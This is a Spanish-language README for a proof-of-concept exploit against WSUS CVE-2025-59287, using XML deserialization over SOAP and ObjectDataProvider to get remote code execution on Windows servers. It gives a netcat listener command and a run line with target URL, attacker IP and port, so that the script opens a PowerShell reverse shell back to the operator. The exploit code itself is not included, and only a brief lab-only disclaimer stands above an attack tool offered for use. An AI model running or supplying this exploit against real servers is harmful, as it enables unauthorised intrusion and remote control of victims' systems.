
PoC exploit para WSUS CVE-2025-59287 que utiliza deserialización XML para lograr una reverse shell de Windows a través de SOAP y ObjectDataProvider.
WSUS CVE-2025-59287 – Deserialización XML RCE (Reverse Shell) Un PoC enfocado para explotar WSUS CVE-2025-59287 mediante deserialización XML para lograr una reverse shell de Windows. Este script solo admite un payload de reverse shell (sin fallback de calc). Objetivo: Windows Server con rol WSUS Técnica: SOAP + deserialización ObjectDataProvider Resultado: cmd.exe lanza una reverse shell de PowerShell hacia tu listener Aviso legal Solo para pruebas autorizadas en entornos de laboratorio. Eres responsable de cumplir con todas las leyes aplicables. Requisitos Python 3.x Acceso de red a los endpoints de WSUS (normalmente 8530/8531) Listener en tu máquina (p. ej., nc)
nc -lvnp 4444
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u: URL base de WSUS (http/https, normalmente puerto 8530/8531) -l: Tu IP para recibir la shell -p: Puerto de tu listener --debug: Salida detallada